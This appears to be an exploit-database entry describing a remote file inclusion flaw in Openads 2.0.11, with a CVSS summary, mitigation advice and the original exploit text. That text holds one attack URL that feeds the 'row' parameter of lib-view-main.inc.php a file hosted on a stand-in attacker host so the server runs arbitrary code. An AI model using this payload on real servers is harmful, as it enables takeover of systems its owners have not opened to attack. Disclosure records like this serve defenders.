header-logo
Suggest Exploit
vendor:
Openads-2.0.11
by:
HaCkErS eV!L
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Openads-2.0.11
Affected Version From: 2.0.11
Affected Version To: 2.0.11
Patch Exists: NO
Related CWE: N/A
CPE: 2.0.11
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu
2011

Openads-2.0.11 Remote File inclusion Vulnerability

Openads-2.0.11 is vulnerable to Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable parameter 'row' in 'lib-view-main.inc.php' file. This malicious URL can be used to execute arbitrary code on the vulnerable server.

Mitigation:

To mitigate this vulnerability, user input should be validated and filtered properly. Also, the web application should be kept up-to-date with the latest security patches.
Source

Exploit-DB raw data:

# Exploit Title: Openads-2.0.11 Remote File inclusion Vulnerability
# Google Dork: Just open you eyes ;) 
# Date: 02/09/2011
# Author: HaCkErS eV!L
# E-mail:Q8hack@msn.com
# Software Link: http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version: 2.0.11
# Tested on: ubuntu 


--------eXploit---------

#RFI: http://www.site.com/Openads-2.0.11/libraries/lib-view-main.inc.php?row=http://evil.txt?

----------------------------------------------------------
Greets to my friend Sirus and all TeaM KuWaiT HaCkErS ;)
----------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR